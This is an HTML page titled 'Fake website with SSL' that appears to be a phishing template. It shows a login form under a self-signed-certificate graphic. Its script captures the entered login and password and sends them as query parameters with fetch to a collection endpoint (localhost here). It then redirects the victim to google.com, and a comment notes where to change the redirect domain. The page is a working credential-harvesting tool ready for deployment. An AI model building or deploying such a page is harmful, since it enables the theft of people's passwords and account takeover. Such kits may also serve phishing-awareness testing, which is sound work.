<!DOCTYPE html>
<html>

<head>
    <title>Fake website with SSL</title>
    <style>
        body {
            background-color: #141414;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .login-form {
            background-color: #fafafa;
            border-radius: 10px;
            padding: 40px;
            text-align: center;
            width: 300px;
            margin: 0 auto;
        }

        .login-form h2 {
            margin-bottom: 0;
        }

        .login-form .sub-title {
            font-size: 20px;
            margin-bottom: 50px;
        }

        .login-form input {
            display: block;
            width: 93%;
            height: 30px;
            margin-bottom: 20px;
            padding: 10px;
            border: none;
            border-radius: 5px;
            outline: none;
        }

        .login-form button {
            width: 100%;
            padding: 10px;
            border: none;
            border-radius: 5px;
            background-color: #2aac2a;
            color: #fafafa;
            cursor: pointer;
        }

        .login-image {
            width: 90%;
            height: 90%;
            margin-bottom: 15px;
        }

        .login-form input:focus::placeholder {
            font-size: 12px;
            transform: translateY(-15px);
            transition: transform 0.3s ease;
            margin-top: 15px;
        }

        .login-form input:invalid+button {
            background-color: #e1dddd;
        }
    </style>
</head>

<body>
    <div class="login-form">
        <img class="login-image" src="ssl.png" alt="">
      <p class="sub-title">Self-signed certificate</p>
      <form
        id="myForm"
        action="https://localhost/"
        method="GET"
        onsubmit="send_form(event)"
      >
        <input
          type="text"
          name="login"
          placeholder="login"
          required
        />
        <input
          type="password"
          name="password"
          placeholder="password"
          required
        />
          <button type="submit">Submit</button>
      </form>

      <script>
        function send_form(event) {
          event.preventDefault();

          const formData = new URLSearchParams(
            new FormData(document.getElementById("myForm"))
          ).toString();

          fetch("https://localhost/?" + formData, {
            method: "GET",
          })
            .then((response) => {
              if (response.ok) {
                // Replace the domain below for redirect domain
                window.location.href = "https://www.google.com";
              } else {
                console.error("Erro no envio dos dados");
              }
            })
            .catch((error) => {
              console.error("Erro ao enviar os dados:", error);
            });
        }
      </script>
    </div>
  </body>

</html>